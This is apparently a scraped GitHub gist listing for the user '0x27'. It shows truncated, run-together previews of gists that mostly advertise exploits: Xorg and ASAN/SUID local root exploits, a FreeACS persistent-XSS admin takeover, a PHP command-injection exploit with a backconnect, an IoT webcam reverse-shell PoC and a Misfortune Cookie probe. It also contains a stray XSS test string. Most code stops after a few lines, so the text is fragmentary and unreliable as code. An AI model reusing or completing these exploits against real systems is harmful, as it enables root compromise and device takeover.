David Davidson 0x27

💭
'"/><script>alert(0)</script>
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
#********************************************************************
# CONFIGURATION FILE FOR ADCD Z/OS 1.10 SUMMER *
#********************************************************************
# FOR ALL THE LOADPARM OPTIONS VISIT: *
# http://dtsc.dfw.ibm.com/MVSDS/'HTTPD2.ADCD.GLOBAL.HTML(READ110S)' *
#********************************************************************
# CUSTOM LOADPARM OPTIONS *
# SA - LOADS ALL LIBRARIES AND STARTS UP AUTOMATION (JES2) *
# J3 - LOADS ALL LIBRARIES AND STARTS UP BASIC z/OS SYSTEM (JES3) *
#********************************************************************
#!/usr/bin/env bash
# SEE YOU SPACE COWBOY by DANIEL REHN (danielrehn.com)
# Displays a timeless message in your terminal with cosmic color effects
# Usage: add "sh ~/seeyouspacecowboy.sh; sleep 2" to .bash_logout (or similar) in your home directory
# (adjust the sleep variable to display the message for more seconds)
# Cosmic color sequence
#!/bin/bash
echo "SSH hangup user tool. For killing other users connections."
if [ $# -eq 0 ]
then
echo "use: $0 <PTS number to kill>"
exit
fi
echo "Terminating PTS/$1"
# Owner of the target pseudo-terminal, taken from the first argument
OWNER=$(stat -c '%U' "/dev/pts/$1")
SSH_PID=$(pgrep -a sshd | grep pts/$1 | cut -d ' ' -f 1)
0x27 / freeacs-pwn.py
Created April 7, 2017 14:08
FreeACS Remote Takeover 0day (Persistent XSS via CWMP NOTIFY -> Add Admin User
#!/usr/bin/python
# world's cheapest exploit - made by copypasting from stackoverflow.
# released at BSides Edinburgh.
# Exploits freeacs - freeacs.com
# TL;DR:
# - Persistent XSS via CWMP Notify message
# - XSS fires in admin session and adds a user
# HACK THE PLANET!
# Darren Martyn - @info_dox - 7th March 2017
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
#!/usr/bin/python2
# coding: utf-8
# Example of how not to code PHP... Not a serious exploit, just one for fun as
# an example of how fucking badly people screw up. Picked an app while githubbin'
# and here's the ruinage.
# Exploits trivial command injection, followed by abusing the lolsudo implemented.
# Seriously, this dude's programming licence needs to be revoked.
# BONUS: Includes SCTP Backconnect for Great Justice reasons :D
# Screenshot: http://i.imgur.com/0CWDs8m.png
# Twitter: @dailydavedavids
#!/usr/bin/python2
# coding: utf-8
# implements: https://twitter.com/twisteddoodles/status/863474505808846848
# we import some random
import random
# first, we create our arrays, and pick random words from them and store.
a = random.choice(["cat", "horse", "seagull", "dolphin", "fire engine"])
b = random.choice(["escape", "make love to", "smother", "dance with"])
c = random.choice(["drumkit", "firework", "toilet", "seagull", "bag"])
d = random.choice(["disco", "airport", "changing room", "tumble dryer"])
0x27 / upwned247.php
Created May 5, 2017 11:44 — forked from Wack0/upwned247.php
UCam247/Phylink/Titathink/YCam/Anbash/Trivision/Netvision/others IoT webcams : remote code exec: reverse shell PoC. (works only in qemu usermode)
<?php
/*
Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU
usermode emulation (seems I pushed an old version), and removed debug output.
-------------------------
NB: THIS PoC ONLY WORKS IN QEMU USERMODE EMULATION!
If anyone wants to fix this, go ahead (no pun intended).
However, I don't have a vulnerable product and am unwilling to acquire one.
0x27 / misfortunecookie.py
Last active January 20, 2017 05:05
checks for misfortune cookie vuln
#!/usr/bin/python2
# coding: utf-8
# misfortune cookie probe
# ~ skyhighatrist
import requests
import sys
def check(ip):
    print "{+} Probing %s for the Misfortune Cookie Vuln..." %(ip)
    url = "http://%s:7547/lol" %(ip) # /lol will never exist so it makes a good canary